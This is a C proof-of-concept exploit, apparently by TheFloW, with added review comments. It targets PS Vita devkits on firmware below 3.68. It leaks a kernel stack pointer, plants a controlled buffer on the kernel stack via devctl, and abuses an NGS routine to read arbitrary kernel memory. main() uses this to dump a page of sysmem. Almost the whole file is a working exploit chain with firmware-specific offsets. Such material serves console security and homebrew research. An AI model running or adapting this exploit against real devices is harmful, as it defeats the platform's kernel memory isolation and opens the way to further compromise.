// PS Vita arbitrary kernel-memory read PoC for devkits running FW < 3.68, by TheFloW.
// The chain below leaks a kernel stack pointer, plants a caller-controlled buffer on that
// stack via devctl, then has an NGS routine dereference it on the caller's behalf.
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <malloc.h>

#include <psp2/appmgr.h>
#include <psp2/io/devctl.h>
#include <psp2/io/dirent.h>
#include <psp2/io/fcntl.h>
#include <psp2/io/stat.h>
// SCE exports used as the leak and read primitives below. They are not declared by
// the headers included above, so they are prototyped here by hand (presumably
// resolved against the module's NID imports at link time — not visible in this file).
// sceMotionDevGetEvaInfo: fills 0x12 words at `info`; words 0 and 3 are consumed
// as leaked kernel addresses (see main / kernel_read_word).
int sceMotionDevGetEvaInfo(void *info);
// sceNgsVoiceDefinitionGetPresetInternal: reads a "preset" described at `src` and
// writes the result to `out`; its return convention is not visible here.
int sceNgsVoiceDefinitionGetPresetInternal(void *src, int pos, void *out);
/*
 * Read one 32-bit word of kernel memory at `src` into the user buffer `dst`.
 *
 * Sequence (order is load-bearing; every step is a side effect on kernel state):
 *   1. a user call leaves a kernel stack pointer in a slot that
 *   2. a second call leaks back to user mode,
 *   3. from which the kernel-stack location of a devctl in-buffer is computed,
 *   4. a devctl copies a caller-controlled 8-byte buffer to that location, and
 *   5. an NGS routine is pointed at the copy so it reads kernel memory for us.
 *
 * dst: receives the word. The byte count actually written by
 *      sceNgsVoiceDefinitionGetPresetInternal is not visible here; the name and
 *      the 4-byte stride in kernel_read assume exactly 4 bytes — TODO confirm.
 * src: kernel address to read (truncated to 32 bits; the target is 32-bit ARM).
 * Returns the NGS call's return value; its success/error convention is not
 * visible in this file, and callers currently ignore it.
 *
 * NOTE(review): the stack offset (0xAF0 - 0x30) and the leak slot (info[3]) are
 * firmware-specific constants supplied by the author. Nothing validates that the
 * leaked value looks like a kernel stack address before it is used, so on an
 * unsupported firmware steps 4-5 silently operate on a wrong address.
 */
int kernel_read_word(void *dst, void *src) {
  uint32_t info[0x12];
  // 1) Call a function that writes sp to kernel stack (author's note; the
  //    arguments are all NULL, so the call is expected to fail after doing so)
  sceAppMgrLoadExec(NULL, NULL, NULL);
  // 2) Leak kernel stack: fills `info` with 0x12 words of kernel data
  sceMotionDevGetEvaInfo(info);
  // 3) Get kernel stack address: word 3 of the leak holds a kernel stack
  //    pointer; mask down to the 4 KiB page base
  uint32_t kstack_addr = info[3] & 0xFFFFF000;
  //    Fixed offset from that page base where step 4's in-buffer copy is
  //    expected to land (firmware-specific, FW < 3.68 devkits)
  uint32_t kstack_devctl_inbuf_addr = kstack_addr + 0xAF0 - 0x30;
  // 4) Write data into kernel stack: the devctl copies `inbuf` into kernel
  //    space on the way in. Empty device name / command 0 — the call is
  //    presumably meant to fail after the copy; its result is ignored.
  uint32_t inbuf[2];
  //    word 0: `src` expressed as a displacement from the buffer's own kernel
  //    address, i.e. (copy + word0) == src
  inbuf[0] = (uint32_t)src - kstack_devctl_inbuf_addr;
  //    word 1: presumably a terminator/sentinel the preset parser expects —
  //    confirm against the NGS implementation
  inbuf[1] = 0xFFFFFFFF;
  sceIoDevctl("", 0, inbuf, sizeof(inbuf), NULL, 0);
  // 5) Read kernel: hand the NGS lookup the kernel-stack copy as its preset
  //    descriptor; it presumably follows word 0 relative to that descriptor,
  //    landing on `src`, and copies the result to `dst`
  return sceNgsVoiceDefinitionGetPresetInternal((void *)kstack_devctl_inbuf_addr, 0, dst);
}
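/*
 * Read `size` bytes of kernel memory starting at `src` into `dst`, one 32-bit
 * word at a time via kernel_read_word.
 *
 * dst:  user buffer of at least `size` bytes.
 * src:  kernel address (passed through unchanged, word by word).
 * size: byte count; 0 reads nothing.
 *
 * A `size` that is not a multiple of 4 is handled by reading the last word into
 * a scratch variable and copying only the remaining bytes, so nothing is written
 * past dst + size (stepping by 4 over the whole range would spill up to 3 bytes
 * past the end of `dst`). Pointer arithmetic is done on byte pointers rather
 * than on `void *`, which is a GNU extension.
 *
 * NOTE(review): kernel_read_word's return value is discarded because its
 * success/error convention is not visible in this file; a failed word leaves
 * stale bytes in `dst`. The fix assumes kernel_read_word writes exactly 4 bytes
 * (see its header comment).
 */
void kernel_read(void *dst, void *src, uint32_t size) {
  uint8_t *out = (uint8_t *)dst;
  uint8_t *in = (uint8_t *)src;
  uint32_t i;

  // Whole words. `size - i >= 4` cannot overflow: i never exceeds size.
  for (i = 0; size - i >= 4; i += 4) {
    kernel_read_word(out + i, in + i);
  }

  // Partial trailing word (1..3 bytes): fetch into scratch, copy what fits.
  if (i < size) {
    uint32_t word = 0;
    kernel_read_word(&word, in + i);
    memcpy(out + i, &word, size - i);
  }
}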
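/*
 * PoC entry point: obtain a kernel address through the same
 * sceAppMgrLoadExec / sceMotionDevGetEvaInfo pair that kernel_read_word uses,
 * then read one page from it into a local buffer.
 *
 * Word 0 of the leak is treated as a pointer into sysmem (the author's naming;
 * not verified here). The buffer is not used afterwards — this only
 * demonstrates that the read primitive works. Returns 0.
 *
 * Changes from the original: the leaked integer is converted to a pointer
 * explicitly instead of through an implicit int-to-pointer conversion (a
 * constraint violation in C and a hard error on newer compilers), the unused
 * kernel-stack leak is dropped, and the read length is tied to the buffer size.
 */
int main(void) {
  uint32_t info[0x12];

  // Leak kernel addresses (see kernel_read_word steps 1-2).
  sceAppMgrLoadExec(NULL, NULL, NULL);
  sceMotionDevGetEvaInfo(info);
  uint32_t sysmem_addr = info[0] & 0xFFFFF000;  // page base of the leaked pointer

  // Read one page of sysmem.
  char sysmem_buf[0x1000];
  kernel_read(sysmem_buf, (void *)(uintptr_t)sysmem_addr, sizeof(sysmem_buf));
  return 0;
}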